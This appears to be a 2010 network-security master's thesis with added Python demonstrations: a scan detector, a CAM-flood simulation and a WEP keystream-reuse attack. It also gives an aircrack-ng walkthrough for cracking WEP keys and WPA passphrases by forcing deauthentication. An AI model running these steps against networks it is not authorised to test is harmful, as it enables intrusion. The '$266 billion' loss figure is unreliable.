Page 1: Master’s Thesis in Network Engineering

i

Technical report, IDE 1004, February 2010

Network Security Analysis

Master’s Thesis in Network Engineering

Aamir Hassan and Fida Muhammad

School of Information Science, Computer and Electrical

Engineering

Halmstad University


Preface

First of all we would like to present our hearty gratitude to ALLAH ALMIGHTY, who always blesses us and makes our path easy during the journey of our lives. We are also very thankful to Professor Tony Larson, who patiently helped us to complete this work smoothly. Indeed, his efforts and talent make it really easy to overcome the hurdles without any problem. Thank you for guiding us.

Also thanks to our parents and their prayers, who always take our work into their consideration and remembered us during their supplication.

Finally, we would like to thank everyone for their nice support and feedback.

Aamir Hassan
Fida Muhammad
Halmstad University 2010


Abstract

Security is the next step once a network has been successfully deployed. There are many types of attacks that could potentially harm the network, and an administrator should carefully document and plan for the weak areas where the network could be compromised. Attackers use special tools and techniques to find all the possible ways of defeating the network security.

This thesis addresses the possible tools and techniques that attackers use to compromise a network. Exploring these tools helps an administrator find the security holes before an attacker can. All of the tools in this thesis are discussed for forensic purposes only. Securing routers and switches in the best possible way is another goal. In this part we try to identify important ways of securing these devices, along with their limitations, and then determine the best possible approach. The solution is checked with network vulnerability tools to obtain the results. It is important to note that most of the attention in network security is given to the router, while far less attention is given to securing a switch. This thesis therefore also addresses further ways of securing a switch when there is no router in the network.


Contents

1 Introduction .... 1
1.1 Problem addressed in this thesis .... 1
1.2 Goal of the thesis .... 2
1.3 Structure of this thesis .... 2
2 Related Work .... 4
2.1 Next generation intrusion detection system .... 4
2.2 Security implication of IPv6 .... 4
2.3 Network security based on system dynamics .... 4
2.4 Application of grey relation in analyzing network security events .... 4
2.5 Evaluation of security risks associated with networked information systems .... 4
2.6 A layered approach to computer network security .... 5
3 Categories of Intruders and Attackers .... 6
3.1 Types of attacker .... 6
3.1.1 White hat hacker .... 6
3.1.2 Black hat hacker .... 6
3.1.3 Gray hat hacker .... 6
3.1.4 Phreaker .... 6
3.1.5 Script kiddy .... 7
3.1.6 Hactivist .... 7
3.1.7 Academic hacker .... 7
3.2 Categories of attack .... 7
3.2.1 Passive attack .... 7
3.2.2 Active attacks .... 7
3.2.3 Close-in .... 7
3.2.4 Distributed attacks .... 7
3.3 Seven steps to hack a network .... 8
3.4 Passive reconnaissance and active access attacks .... 8
3.4.1 Reconnaissance attack .... 8
3.4.2 Access attacks .... 8
4 Security: Attack and Counter Attack .... 10
4.1 Wireless networks .... 10
4.1.1 WEP (Wired Equivalent Privacy) .... 10
Wi-Fi Protected Access (WPA and WPA2) .... 12
4.2 Man-in-the-middle .... 13
4.2.1 Man-in-the-middle attack .... 13
4.2.2 Man-in-the-middle counter attack .... 14
4.3 Man-in-the-middle with SSL Strip .... 14
4.3.1 Man-in-the-middle with SSL Strip attack .... 15
4.3.2 Man-in-the-middle with SSL Strip counter attack .... 16
4.4 Session hijacking .... 16
4.4.1 Session hijacking counter attack .... 17
4.5 Copying IP telephony conversation .... 17
4.5.1 IP telephony conversation – attack .... 17
4.5.2 IP telephony conversation – counter attack .... 17
4.6 MAC address spoofing .... 17
4.6.1 MAC address spoofing – attack .... 18
4.6.2 MAC address spoofing – counter attack .... 18
4.7 Bypassing the login password .... 18
4.7.1 Bypassing the login password – attack .... 19
4.7.2 Bypassing the login password – counter attack .... 19
4.8 Port redirection .... 19
4.8.1 Port redirection – attack .... 19
4.8.2 Port redirection – counter attack .... 20
4.9 Denial of Service (DoS) .... 20
4.9.1 Denial of Service (DoS) – attack .... 20
4.9.2 Denial of Service (DoS) – counter attack .... 20
4.10 Layer 1 security issues .... 21
4.11 Layer 2 security issues .... 21
4.11.1 CAM overflow .... 21
4.11.2 Root Guard .... 22
4.11.3 BPDU Guard .... 22
4.11.4 Trunk auto-negotiation .... 22
4.11.5 VLAN hopping .... 22
4.11.6 Wireless bridge .... 23
4.11.7 DHCP spoofing .... 23
4.12 Layer 3 security issues .... 24
4.12.1 TCP SYN flooding .... 24
4.12.2 Ping of Death attack .... 24
4.12.3 Packet sniffing .... 25
4.12.4 RIP attack .... 25
4.12.5 IP spoofing .... 25
4.12.6 Brute force attack .... 25
5 Case Study 1: Implementing Layer 2 Security .... 26
5.1 Planning the network .... 27
5.2 Cisco IBNS (Identity Based Network Service) / NAC (Network Admission Control) / 802.1X .... 27
5.3 Implementing 802.1X .... 30
5.4 Results of implementing 802.1X .... 30
5.5 Securing data through VPN .... 31
6 Case Study 2: Implementing Layer 3 Security .... 32
6.1 Cisco strategy for network defence .... 32
6.2 Implementing Layer 3 security .... 33
6.3 Building site-to-site Virtual Private Network (VPN) .... 33
6.4 Implementing classical firewalls / CBACs .... 35
6.4.1 Results .... 35
6.5 Implementing Network Based Access Recognition (NBAR) .... 36
6.5.1 Results .... 36
6.6 Implementing Cisco Easy VPN Server .... 38
6.7 Conclusion .... 39
7 Conclusion and Future Work .... 40
8 Abbreviations .... 42
9 References .... 44
10 Appendix .... 48


List of Figures

Figure 2: CAM Overflow .... 21
Figure 3: Wireless Bridge .... 23
Figure 4: Root Guard / BPDU Guard / DHCP Snooping .... 24
Figure 5: Case study related to Layer 2 securities .... 26
Figure 6: 802.1x authentication process .... 29
Figure 1: Cisco Defense in Depth (DID) .... 32
Figure 7: Layer 3 security scenario .... 33
Figure 8: Sniffing data across the network using Wireshark without security .... 34
Figure 9: Sniffing data across the network using Wireshark with security .... 35
Figure 10: Results from CBAC configuration .... 36
Figure 11: Tunnel p2p traffic through port 80 before NBAR .... 37
Figure 12: Tunnel p2p traffic through port 80 after NBAR .... 37
Figure 13: Username and password challenge for Easy VPN client .... 39


1 Introduction

Establishing and testing the security is the next step after building a network. Securing a network implies protecting it from unwanted attacks that could potentially bring down the whole network. There are a number of ways that an intruder could employ from inside or from outside the network. Applying his skills and knowledge, an intruder can infect the computers with data or programs, causing an immediate network outage, or can steal sensitive data such as bank transactions.

How is an intruder successful in attacking a network? The answer lies either in the absence of network security or in the poor performance of the network security methods deployed. An intruder and a network administrator position and reason quite the opposite of each other. The task of an intruder is to find his way into the network and carry out some malicious activity, whereas the task of the network administrator is to protect the network from such incidents. An administrator sometimes lags behind in this area because he has only learnt about the ways of stopping such attacks, but never learnt how these attacks are performed. A good network administrator must think from the hacker's perspective, i.e. break into his own network and, at the same time, find ways of mitigating the attacks.

The terms 'hacker' and 'attacker' are used interchangeably. The more sophisticated term used for these attackers is 'hackers', and there are categories of hackers who perform their attacks for a specific purpose. The United States FBI/CSI now refers to these attackers as criminals because they are involved in attacks, small to big, that can cause trust exploitation, information stealing or helping other sources by some illegal means, as other criminals do without computers. According to CSI surveys, the following facts were obtained.

According to the CSI "200 Computer Crime and Security Survey", in 2000 a total loss of $266 billion was reported. These losses also included the stealing of proprietary information and financial fraud [23].

In 2003, a popular network attack, DoS, was introduced, which was then enhanced to a DDoS attack. Due to the DoS and DDoS attacks in 2003, a total of $201,797,340 of financial loss was reported [28].

In 2007, virus attacks were radically increasing and constituted the second most dangerous attack after financial fraud.

The most successful and powerful attack is performed from inside the network. In many situations, a network administrator trusts all his internal users and never suspects any attack from their side. However, thinking from the other side, no one can be totally trusted.

1.1 Problem addressed in this thesis

It is always an investment to develop and maintain a policy for securing the network. Depending on how the network has been built, an administrator has to monitor and check what areas could be infected. It could take some time to find loopholes in the network that may lead to it being compromised. However, once found, a policy can be made and the network security implemented. In contrast to securing a network, it is easy to just build a network and leave it unsecured. At the beginning this is easy, but once the network has been compromised by internal or external threats, the network administrator instead faces a very high work overhead compared to deploying security up front. Before an administrator takes something into consideration, it is important for him to know the threats and their severity levels. This thesis focuses on giving an analysis of security threats and then suggests their mitigation.

1.2 Goal of the thesis

The main goals of network security are confidentiality, integrity and availability. To properly suggest and implement the solutions required for achieving a well-running network, the work in this thesis has been divided into two parts:

- Exploring the tools and techniques that exploit the network security.
- Debating different ways of securing Layer 2 and Layer 3 devices, and finding the best possible solution by using network vulnerability tools to explore the extent of network security.

1.3 Structure of this thesis

The work in this thesis is presented as follows. In chapter 2, related work in the field of network security is discussed. In chapter 3, common categories of attacker, and the way these attacks are performed, are discussed. Chapter 4 is dedicated to the methods and tools that exploit vulnerabilities and can be used to attack a network. In chapters 5 and 6, separate case studies on Layer 2 and Layer 3 are conducted. Finally, the thesis ends with a comprehensive conclusion and corresponding proposals for future work.

2 Related Work

2.1 Next generation intrusion detection system

The McAfee network protection solution [59] promotes the next generation intrusion detection system (IDS). At the time it was developed, there was a vital need for real-time network protection that could detect and report unwanted traffic immediately without major involvement of an administrator. Though such systems did address the major parts of the problem, with time they seem insufficient given the pace at which networks are changing. With an IDS, the approach is to detect a security flaw rather than to prevent it; hence the network always faced the threat of a possible attack. The aim was to improve the IDS approach towards a more advanced one, which has the ability not only to detect threats but also to stop them.

2.2 Security implication of IPv6

With the development of IPv6, many weaknesses and problems that IPv4 had are addressed [4]. IPv4 explicitly uses the ESP or AH protocol to encrypt the data, but now, with the enormously large address field of IPv6, the security mechanism is built into the IPv6 header. In the explanation of IPv6 security features, the author states that an intruder will face difficulty during a backdoor or sniffing attack with IPv6.

2.3 Network security based on system dynamics

Four Chinese students performed a simulation of the behaviour of worm attacks based on system dynamics [3]. The worms produced arbitrary code inside the memory and, with the passage of time, started to corrupt the local file system. In this project, the students simulated a worm attack on the basis of its system dynamics, and they also described the worm features. The approach of this project was to extend network security against malicious software.

2.4 Application of grey relation in analyzing network security events

Network attacks can also be analyzed on the basis of events. In this project, the author [29] sorted and labelled attacks by severity level and then generated reports for the different severity levels. The author's approach was to design a system that could guide security management, prevent threats, and block and reduce risks. The author performed a series of case studies predominantly to analyze network security.

2.5 Evaluation of security risks associated with networked information systems

The authors of this thesis performed a risk analysis associated with the growing internet usage inside a company [36]. A literature review and a case study were conducted on a B2B application implemented in a large Japanese electronics firm based in Australia. The authors gathered information on security threats that reach the host or network infrastructure in connection with the network administrator's updating of the latest software patches. In the final part, the project concluded with a security evaluation framework that helps to obtain acceptable results in real applications without too much involvement of a security expert.

2.6 A layered approach to computer network security

The project work was solely dedicated to addressing the problems found at the different layers of the OSI reference model [48]. The authors detailed the security aspects and threats related to the link layer, and touched on the surface of the network and transport layers. The authors also examined the insider issues that arise from internet usage and addressed the problems found in the internet protocol stack.

3 Categories of Intruders and Attackers

This section briefly discusses different types of network attacks and intruders. Before getting into the details of attack types, it is important to know about the person behind the scene.

3.1 Types of Attacker

These are people who want to get into the system and compromise its security. They range from those who have little experience to those who are highly skilled. Here, experience refers to their technical abilities in the field of computers and network systems. Little or no knowledge refers to those who can, by the use of some tools, break into the system without requiring a high level of technical knowledge. This section classifies them into groups, based on their knowledge and their purpose, reason or motivation for attacking the network.

3.1.1 White hat hacker

White hat hackers are generally termed "ethical hackers". They are the better half of this dark world of hacking [2]. They represent those who have the knowledge and technical ability to easily break into a system, but they never exercise this. On the contrary, they use this knowledge for good and fill jobs such as network security engineer or administrator. White hat hackers are amongst the most highly paid individuals in the US [14]. This reflects the fact that the use of the internet is constantly increasing and so are the security threats. The EC-Council now offers a CEH (Certified Ethical Hacker) [30] course, where people are trained on how to mitigate attacks such as hacking.

3.1.2 Black hat hacker

Black hat hackers, as the name implies, are the evil side of hacking, and their main objective is to take over the network by hook or by crook, and to destroy or sabotage the network resources [39]. Black hat hackers hold conferences on how to improve their hacking capabilities. These people are very experienced and know almost all the ways to break into a network. There is no particular purpose for which black hat hackers hack, but their intentions may include revenge, stealing money, or maybe just checking how far they have improved in this field. Black hat hackers possess the same knowledge as white hat hackers, with the only difference that white hat hackers work towards securing the network, unlike their black hat counterparts.

3.1.3 Gray hat hacker

Gray hat hackers can be thought of as white hat hackers who occasionally stray from their goal of protecting the network and, instead, act unethically. Gray hat hackers are not permanently employed at companies; rather, they are called in for security audits. Given the opportunity, gray hat hackers might, for their own personal gain, hack into the system and steal desired data.

3.1.4 Phreaker

Phreakers [50] can be thought of as hackers in the world of telecommunication rather than IP networks. These are people who can trick the telecom system into making long-distance calls for free. The number of phreakers is in decline, but some strategy is still needed to cater for this problem.

3.1.5 Script kiddy

Script kiddies [60] are not true hackers and have almost no knowledge of hacking, but can download killer applications and use them with little research to attack a network. For example, Nessus [61] is a free security auditing tool. Script kiddies will download this tool to perform an audit and, for example, find out that someone is running the IIS [40] web server on port 80, since IIS is prone to security weaknesses. By using such tools, they could find the security holes to attack the network running IIS.

3.1.6 Hactivist

Hactivists [7] are those who are driven by political motivation to hack into a network. Often, it is terrorists or foreign agencies who hack into other countries' sites to steal sensitive information in order to achieve their political motives.

3.1.7 Academic Hacker

Academic hackers [15] hack for their academic careers. They are kids who want to break into the university firewalls to change their grades or steal a paper to get good scores in exams.

3.2 Categories of Attack

This section discusses how a hacker can perform an attack on a network [52].

3.2.1 Passive attack

A passive attack, also known as a reconnaissance attack, is the first step the hacker takes in order to perform hacking. During this phase, the hacker tries to gather information with the aid of packet sniffing, scanning active ports or performing ping scans to see which IP addresses are active around the network. This is the initial phase of hacking, and usually it is very difficult to detect any such activity.
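The reconnaissance traffic described here (ping sweeps and port scans) is hard to spot one packet at a time, but it stands out once a defender counts what a single source touches within a time window. The following Python detector is an added example, not part of the thesis; it runs over constructed flow records (not captured traffic) with illustrative thresholds, and it also serves the ping-sweep-then-port-scan sequence described in section 3.4.1.

```python
from collections import defaultdict, deque
from dataclasses import dataclass

# Constructed sample flow records, not captured traffic. Each record is
# (timestamp_seconds, src_ip, dst_ip, protocol, dst_port); dst_port is None for ICMP.
SAMPLE_FLOWS = [
    # Ordinary client traffic: a couple of connections to two servers.
    (0.0, "10.0.0.5", "10.0.0.20", "tcp", 443),
    (1.0, "10.0.0.5", "10.0.0.21", "tcp", 80),
]
# Ping sweep: one source sends ICMP echo requests to 40 hosts in a few seconds.
SAMPLE_FLOWS += [
    (2.0 + i * 0.1, "10.0.0.99", f"10.0.0.{h}", "icmp", None)
    for i, h in enumerate(range(1, 41))
]
# Port scan: one source probes 60 distinct TCP ports on a single host.
SAMPLE_FLOWS += [
    (10.0 + i * 0.05, "10.0.0.77", "10.0.0.20", "tcp", p)
    for i, p in enumerate(range(1, 61))
]


@dataclass(frozen=True)
class Alert:
    kind: str      # "port_scan" or "ping_sweep"
    src: str       # scanning source address
    target: str    # destination host for a port scan, "*" for a sweep
    count: int     # distinct ports or hosts seen when the threshold was crossed


def detect_recon(flows, window=60.0, port_threshold=20, host_threshold=16):
    """Flag reconnaissance by counting what each source touches inside a sliding window.

    A port scan is one source reaching >= port_threshold distinct TCP/UDP ports on one
    destination within `window` seconds; a ping sweep is one source sending ICMP to
    >= host_threshold distinct destinations within the same window. Each (kind, src,
    target) fires once. The window is rescanned per event, which is fine for
    demonstration-sized inputs but not for production traffic volumes.
    """
    by_src = defaultdict(list)
    for ts, src, dst, proto, dport in flows:
        by_src[src].append((ts, dst, proto, dport))

    alerts, fired = [], set()
    for src, events in by_src.items():
        events.sort(key=lambda e: e[0])  # sort by timestamp only (dport may be None)
        recent = deque()
        for event in events:
            recent.append(event)
            # Drop events that have aged out of the window relative to the newest one.
            while event[0] - recent[0][0] > window:
                recent.popleft()

            ports_per_dst = defaultdict(set)
            icmp_hosts = set()
            for _, dst, proto, dport in recent:
                if proto == "icmp":
                    icmp_hosts.add(dst)
                elif dport is not None:
                    ports_per_dst[dst].add(dport)

            for dst, ports in ports_per_dst.items():
                key = ("port_scan", src, dst)
                if len(ports) >= port_threshold and key not in fired:
                    fired.add(key)
                    alerts.append(Alert("port_scan", src, dst, len(ports)))

            key = ("ping_sweep", src, "*")
            if len(icmp_hosts) >= host_threshold and key not in fired:
                fired.add(key)
                alerts.append(Alert("ping_sweep", src, "*", len(icmp_hosts)))
    return alerts


if __name__ == "__main__":
    for alert in detect_recon(SAMPLE_FLOWS):
        print(f"{alert.kind}: {alert.src} -> {alert.target} ({alert.count} distinct)")
```

Thresholds are the tuning knob: the normal client in the sample never crosses them, while a shorter window would let a slow sweep slip through, which is the trade-off behind the thesis's remark that passive reconnaissance is hard to detect.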

3.2.2 Active attacks

After a passive attack, an intruder has enough information about active ports and IP addresses around the network, and has queried enough to launch an active (access) attack. In this phase, the attacker usually performs a "Man in the Middle" attack. The Man in the Middle attack is one of the most dangerous attacks and resides midway in the communication between the gateway and the client. It is transparent in nature, hence eliminating the possibility of it being detected while it sniffs sensitive data. Trust exploitation and password attacks also fall into this category.

3.2.3 CLOSE-IN

These are people who are connected to the inside of the network. Most of the time, the network

administrator is much concerned about securing his network from the outside while neglecting

any possibility of attack from inside his own network. A “close-in” attack means that intruders

are close to the network where they have direct connected links to the network.

3.2.4 Distributed attacks

In a distributed attack the intruder does not act from a single host but coordinates many of them, so the traffic hits the target from several directions at once and no single source can simply be blocked. The distributed denial-of-service (DDoS) attack described in section 4.9 is the common example.

3.3 Seven Steps to hack a network

If we think like a hacker, there are seven steps to hacking into a system. They build on one another, although a real intrusion may skip or repeat some of them. The following is a brief description of how the whole process is carried out.

1. Perform reconnaissance
2. Identify active applications and the type and version of the operating system
3. Gain access to the system
4. Log in with user credentials and escalate privileges
5. Create and gather other usernames and passwords
6. Create a backdoor
7. Use the system

3.4 Passive reconnaissance and active access attacks

This section discusses in detail two well-known methods, reconnaissance and access attacks. The two follow one after the other.

3.4.1 Reconnaissance attack

A passive (reconnaissance) attack [41] is usually the first step. The attacker starts by gathering information about the network: first a ping sweep, then a port scan, which tells the intruder which hosts are alive and which ports are open on them. Such information can also be gathered by so-called "dumpster diving", where the hacker meticulously studies what the organisation throws away and comes up with very useful details that looked worthless to the people who discarded them. Furthermore, the intruder can go all the way and tap the wire while conversations are going on in the LAN; the same can be done by sniffing wireless signals. All such activity is broadly termed "reconnaissance".

3.4.2 Access Attacks

Once the intruder has gathered the preliminary information he or she needs, the next move is the access attack. The attacks most often seen at this stage are DoS and DDoS, even though, strictly speaking, denial of service is its own category rather than an access attack (the access attack proper is the man-in-the-middle or password attack of section 3.2.2); it is described here because it usually follows reconnaissance directly. One form targets the switch: the attacker sends a flood of frames with random, fake source MAC addresses, which fills the CAM (Content Addressable Memory) table the switch uses to map MAC addresses to ports. Once the table is full the switch can no longer learn where the legitimate hosts are and falls back to flooding their frames out of every port, like a hub, and the hacker simply reads the traffic that now reaches his or her port. There is also a plethora of ICMP attacks, easily mistaken for valid ICMP traffic but in fact built from spoofed messages. The ICMP messages most commonly abused are Destination Unreachable (including its Host Unknown code), Time Exceeded, Fragmentation Needed ("packet too big"), Echo Request and Echo Reply. The TCP SYN flood is the most dangerous of these attacks. The intruder opens as many half-open TCP sessions as possible: a half-open session is one where the target has answered the SYN with a SYN-ACK and is waiting for the final ACK of the 3-way handshake, which the attacker never sends. The router or server is so burdened with this unfinished work that it cannot serve legitimate connections and in effect surrenders its resources to the attacker.
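The CAM exhaustion described above is easier to see in a small model. The following Python is an added example written for this edition, not code from the thesis: a learning switch with a bounded MAC table, a victim and a gateway that talk normally, and an attacker on a third port spraying frames with random source addresses (what the macof tool does). The port names, MAC addresses and table size are made up. Real switches either refuse new entries until old ones age out or evict old ones; this model evicts the oldest entry, which is a simplification, but the outcome is the same: the legitimate entries disappear while the flood runs, and the victim's unicast frames are flooded to the attacker's port.

```python
import random
from collections import OrderedDict


class Switch:
    """Minimal learning switch with a bounded CAM (MAC -> port) table."""

    def __init__(self, ports, cam_size):
        self.ports = list(ports)
        self.cam_size = cam_size
        self.cam = OrderedDict()      # mac -> port; insertion order doubles as age
        self.flooded = 0              # frames sent out of all ports

    def forward(self, in_port, src, dst):
        """Learn src on in_port, then return the set of ports the frame leaves on."""
        if src in self.cam:
            self.cam.move_to_end(src)          # refresh the entry
        elif len(self.cam) >= self.cam_size:
            self.cam.popitem(last=False)       # table full: oldest entry goes (simplification)
        self.cam[src] = in_port
        out = self.cam.get(dst)
        if out is None:                        # unknown destination: flood like a hub
            self.flooded += 1
            return {p for p in self.ports if p != in_port}
        return {out}


def random_mac(rng):
    return ":".join(f"{rng.randrange(256):02x}" for _ in range(6))


def demo(cam_size=1000, flood_frames=5000, seed=1):
    """Constructed scenario: victim on gi0/1, gateway on gi0/2, attacker on gi0/3."""
    rng = random.Random(seed)
    sw = Switch(ports=["gi0/1", "gi0/2", "gi0/3"], cam_size=cam_size)
    victim, gateway = "00:11:22:33:44:55", "00:aa:bb:cc:dd:ee"

    # Normal operation: both sides are learned, so their frames stay point to point.
    sw.forward("gi0/1", victim, gateway)
    sw.forward("gi0/2", gateway, victim)
    before = sw.forward("gi0/1", victim, gateway)      # {'gi0/2'}

    # macof-style flood: thousands of frames with random source MACs from the attacker's port.
    for _ in range(flood_frames):
        sw.forward("gi0/3", random_mac(rng), random_mac(rng))

    # The table now holds only attacker junk; the gateway entry is gone, so the victim's
    # next frame is flooded out of every port, including the attacker's.
    after = sw.forward("gi0/1", victim, gateway)
    return {
        "before": before,
        "after": after,
        "attacker_sees_victim": "gi0/3" in after,
        "cam_entries_from_attacker": sum(1 for p in sw.cam.values() if p == "gi0/3"),
    }


if __name__ == "__main__":
    print(demo())
```

The same model explains the countermeasure: limiting the number of MAC addresses a port may learn (port security) stops the attacker's port from ever displacing the legitimate entries.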


4 Security: Attack and Counter Attack

This chapter deals explicitly with the different types of attacks and how to counter them. For sound network administration it is good to study how an attacker thinks, in order to be able to find a solution for the problem. The chapter outlines the important tools and the way they are used, for example to escalate privileges. The case studies discussed in this thesis also focus on wireless networks.

4.1 Wireless Networks

Wireless networks can be protected in many ways. Some important standards related to such

methods are discussed below.

4.1.1 WEP (Wired Equivalent Privacy)

WEP [17] (Wired Equivalent Privacy) was introduced in 1997, with the original IEEE 802.11 standard, as the first technique for securing wireless networks against unauthorised access. WEP offers two ways of authenticating clients.

Open system authentication: the client does not present any credential to the access point. Anyone can authenticate without a key and then associate with the access point. To encrypt and forward data across the wireless network, however, a client still needs the right WEP key.

Shared key authentication: here the WEP key is required for authentication itself, through a four-message challenge exchange.

1. The client sends an authentication request.
2. The access point sends a clear-text challenge to the client.
3. The client encrypts the challenge with the WEP key (RC4, keyed with a per-frame IV and the shared key) and sends the result to the access point.
4. The access point decrypts the response, compares it with the clear-text challenge it sent, and returns a positive or negative response to the client based on the result.

Comparing the two, open system authentication is considered better than shared key authentication (note: both are weak). In shared key authentication anyone can capture the exchange, and since the clear-text challenge and its encrypted form are both on the air, XOR-ing them gives the RC4 keystream for that IV. With that keystream an attacker can answer any later challenge and authenticate without ever knowing the key, and it is also a ready-made tool for decrypting or forging data frames sent under the same IV.
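The keystream reuse in shared key authentication is easy to demonstrate. The following Python is an added example for this edition, not from the thesis or the aircrack-ng project: a toy access point that runs the four-message exchange with a 104-bit WEP key, a legitimate station that answers correctly, and an eavesdropper who XORs the observed challenge and response, then authenticates to the same access point with that keystream and the same IV, never having seen the key. The RC4 implementation is the real cipher; the key value, the IV handling and the omission of the ICV trailer are simplifications made for the example.

```python
import os


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4 key scheduling plus PRGA: the stream cipher WEP uses, keyed with IV || shared key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class AccessPoint:
    """Shared key authentication, messages 2 and 4 (ICV check omitted for clarity)."""

    def __init__(self, wep_key: bytes):
        self.key = wep_key
        self.pending = {}                      # station -> outstanding challenge

    def challenge(self, station: str) -> bytes:
        c = os.urandom(128)                    # message 2: 128-byte clear-text challenge
        self.pending[station] = c
        return c

    def verify(self, station: str, iv: bytes, response: bytes) -> bool:
        c = self.pending.pop(station)
        # message 4: decrypt with IV || key and compare with the challenge we sent
        return xor(response, rc4_keystream(iv + self.key, len(c))) == c


def station_respond(wep_key: bytes, challenge: bytes):
    """Message 3 from a legitimate station: pick an IV, encrypt the challenge."""
    iv = os.urandom(3)
    return iv, xor(challenge, rc4_keystream(iv + wep_key, len(challenge)))


def demo() -> dict:
    key = bytes.fromhex("0123456789abcdef0123456789")   # constructed 104-bit key
    ap = AccessPoint(key)

    # A legitimate station authenticates; the attacker only listens.
    c1 = ap.challenge("laptop")
    iv, r1 = station_respond(key, c1)
    legit_ok = ap.verify("laptop", iv, r1)

    # Challenge and response both crossed the air: XOR gives the keystream for this IV.
    keystream = xor(c1, r1)

    # The attacker now answers a fresh challenge with the same IV and keystream, no key needed.
    c2 = ap.challenge("intruder")
    intruder_ok = ap.verify("intruder", iv, xor(c2, keystream))
    return {"legit_ok": legit_ok, "intruder_ok": intruder_ok}


if __name__ == "__main__":
    print(demo())
```

Nothing in the protocol stops the attacker from reusing the IV, which is the whole problem: WEP's 24-bit IV is sent in the clear and the access point never checks that it is fresh.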

Attacking WEP (Wired Equivalent Privacy)

aircrack-ng [24] is a powerful suite of tools for attacking WEP and WPA [31] keys (WPA is discussed next). It can also be used under Windows but, because of the limited support for wireless adapters there, it is mostly used on Linux.

For this demonstration the Linux distribution Ubuntu 9.04 [18] was installed as a standalone system together with the aircrack-ng utilities, and the attack was launched against a WEP network using open system authentication. We first made sure that aircrack-ng was installed correctly and then confirmed that the wireless adapter was recognised by issuing the following command.


ifconfig wlan0

If the operating system reports the configuration of wlan0, the next step is to check whether the aircrack-ng suite supports the wireless adapter. Issue the following command.

airmon-ng

If the utility lists wlan0 with its chipset type and driver, the next step is to scan for the networks around (this tool also reports hidden networks). Issue the following command at the prompt.

airodump-ng wlan0

Wait at least 30 seconds so that the utility has seen all the wireless networks and their channels. Then press Ctrl+C to end the session (Ctrl+Z would only suspend the process and leave it holding the adapter) and issue the following command to start capturing from the target.

airodump-ng -w <filename> --bssid <BSSID> -c <channel> wlan0

The -w option gives the prefix of the capture file in which the collected frames are stored (airodump-ng appends a sequence number, giving <filename>-01.cap); the BSSID and channel are taken from the output of the previous command. Wait until the #Data column passes 20,000, since the key recovery needs a large number of data frames with distinct IVs, then press Ctrl+C to stop the capture. Now issue the following command and wait about a minute for the key to be recovered.

aircrack-ng <filename>-01.cap

The key is recovered statistically from the captured IVs and shown on the screen.

Wired Equivalent Privacy (WEP) Counter Attack

WEP encryption is very weak, as demonstrated above, and very easy to break without any brute-force attack, but it is still popular among SOHO users. One reason for using WEP in the SOHO environment is that it is faster than WPA, because of the lighter encryption and packet overhead. Another is that with older clients the driver of the wireless adapter cannot be updated to support WPA/WPA2 encryption.

The quick mitigation that stops all of these attacks is to avoid WEP. If there really is no option other than WEP, then stop the DHCP server on the access point so that, even when the key is cracked, nobody is handed an IP address automatically. Assign a manual IP address to every client and change the subnet from the commonly used 192.168.1.x/24 to something unexpected. Many intruders assume that clients use private addressing, and so scan the whole private address space (10.x, 172.16-31.x, 192.168.x) to find the clients around; a subnet outside the private ranges, such as the 23.191.81.x/27 or 131.229.56.x/29 examples used here, defeats that habit. Be aware, though, that such blocks are publicly routable address space belonging to someone else, so using them internally makes those Internet destinations unreachable from the LAN, and an attacker who holds the key can simply sniff a few frames and read the addressing scheme off them. This is quite weak protection for business use, and WEP is not recommended.


Wi-Fi Protected Access (WPA and WPA2)

WPA and WPA2 are two generations of the same Wi-Fi Alliance programme. WPA came as an interim replacement for WEP, to address the weaknesses found in it, while the IEEE 802.11i [19] amendment to the 802.11 standards, which specifies the full mechanism for protecting wireless networks, was being finished; WPA2 is the certification for the complete 802.11i, with AES-CCMP encryption mandatory. WPA offers two ways of authenticating clients.

WPA Enterprise (a RADIUS server [35] is required)

WPA Personal (pre-shared key, with TKIP or AES encryption)

WPA Enterprise is the solution for medium to large businesses. It uses 802.1X [25] to authenticate users through a RADIUS server, most strongly with certificates: a client with a proper certificate installed can access the network, and other EAP methods allow a username and password as well.

WPA Personal is aimed at SOHO (Small Office, Home Office) users and, like WEP, relies on a key shared in advance by everyone on the network. It gives much stronger authentication than WEP and uses TKIP (Temporal Key Integrity Protocol) or AES (Advanced Encryption Standard) for encryption. Unlike WEP's shared-key exchange, WPA never sends anything derived directly from the key in the clear: the passphrase and the SSID are hashed into a pairwise master key, and a four-way handshake between client and access point derives fresh session keys from it and proves to each side that the other holds the same master key. The weakness of WPA Personal is not in TKIP or AES but in the passphrase. The four-way handshake contains everything needed to check a guess offline, so a tool such as coWPAtty [10] or aircrack-ng can run a dictionary of candidate passphrases against a captured handshake. Does choosing AES instead of TKIP prevent this? No. AES-CCMP costs a little more processing, and the handshake's integrity check is computed slightly differently, but the dictionary attack works in exactly the same way against both; aircrack-ng handles either.

Attacking WPA/WPA2 (Wi-Fi Protected Access)

The process of cracking WPA TKIP/AES is similar to the one demonstrated for WEP, but since WPA uses the four-way handshake to verify the client, the attack needs a capture of that handshake, and a client that is already connected will not produce one. aircrack-ng therefore forges a de-authentication frame in the access point's name: the client is kicked off, reconnects, and performs a fresh handshake, which airodump-ng records. Without that handshake there is nothing to run the brute-force attack against. Start with the same steps as explained for WEP. While airodump-ng is collecting data from the access point, open another terminal and type the following command to force a new four-way handshake.

aireplay-ng -0 1 -a <BSSID> -c <client-mac> wlan0

Here -0 1 sends one de-authentication burst, -a is the BSSID of the access point and -c the MAC address of a connected client, both of which airodump-ng shows. The client is de-authenticated and re-associates, completing a four-way handshake. Go back to the first terminal and check the upper right corner, where "WPA handshake: <BSSID>" now appears. Stop airodump-ng with Ctrl+C and launch the dictionary attack. Dictionary files with possible passwords are available for this; remember that these dictionaries run to more than 30 GB, which raises the chance that a common combination is included. They can be downloaded from [5].

For this demonstration the password protecting the access point was <-pMxlionz c0nu3cti05ns->. Now type the following command to search for the password.


aircrack-ng -w <dictionary file> -b <BSSID> <filename>-01.cap

